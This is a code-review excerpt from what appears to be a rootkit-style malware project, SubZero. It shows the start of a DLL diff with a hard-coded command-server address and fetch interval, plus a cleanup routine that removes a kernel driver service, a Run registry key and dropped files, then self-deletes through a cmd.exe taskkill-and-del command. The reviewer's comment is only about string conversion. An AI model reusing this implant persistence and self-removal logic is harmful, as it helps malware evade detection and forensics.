Project/SubZeroDLL/dllmain.cpp

```diff
@@ -0,0 +1,117 @@
+#include "pch.h"
+#include "HttpClient.h"
+#include "ReflectiveLibraryLoader.h"
+#include "../SubZeroDriver/SubZeroCommon.h"
+#include "../SubZeroClient/SubZeroLoaderCommon.h"
+#include "../SubZeroUtils/RegistryManager.h"
+#include "../SubZeroUtils/ServiceManager.h"
+#include "../SubZeroUtils/AutoRegistryKeyHandle.h"
+
+const std::string IpAddress = "192.168.14.139";
+constexpr DWORD Port = 8080;
+constexpr DWORD SecondsBetweenFetches = 5;
+
+BOOL SubZeroCleanup() {	
+    try {
+    	// Uninstall Subzero driver
+        const ServiceManager serviceManager(DRIVER_NAMEW, DRIVER_FULL_PATH, SERVICE_KERNEL_DRIVER);
+        serviceManager.stopAndRemove();
+
+    	// Delete registry key
+        const AutoRegistryKeyHandle autoRegKey(RegistryManager::OpenRegistryKey(REG_SZ_KEY_ROOT, REG_RUN_KEY_PATH));
+        RegistryManager::DeleteRegistryValue(autoRegKey.get(), DRIVER_NAMEW);
+    }
+	catch(std::exception& exception) {
+		// TODO: Handle exception accordingly
+        return FALSE;
+	}
+
+	// Delete files
+    if (!(::DeleteFileW(DRIVER_FULL_PATH.c_str())))
+        if (::GetLastError() != ERROR_FILE_NOT_FOUND)
+            // TODO: Handle exception accordingly
+			return FALSE;
+
+    if (!(::DeleteFileW(LOADER_FULL_PATH.c_str())))
+        if (::GetLastError() != ERROR_FILE_NOT_FOUND)
+            // TODO: Handle exception accordingly
+            return FALSE;
+
+	// Delete current DLL file after its process exits        
+    WCHAR command[MAX_PATH + 100];    
+    DWORD index = swprintf_s(command, MAX_PATH + 100, L"cmd.exe /c timeout 5 > NUL && taskkill /f /PID %d && ", ::GetCurrentProcessId());
+    swprintf_s(command + index, MAX_PATH + 100 - index - 1, L"del \"%ws\"", DLL_FULL_PATH.c_str());	
```

Comment:
You can convert from ASCII to Unicode and vice versa using Atlstr.h
https://docs.microsoft.com/en-us/cpp/atl/string-and-text-classes?view=msvc-160
https://github.com/AvivShabtay/Stresser/blob/a55ace09d85e34288c20625a63d7cc2e40674ba2/Stresser/EndpointController.cpp#L39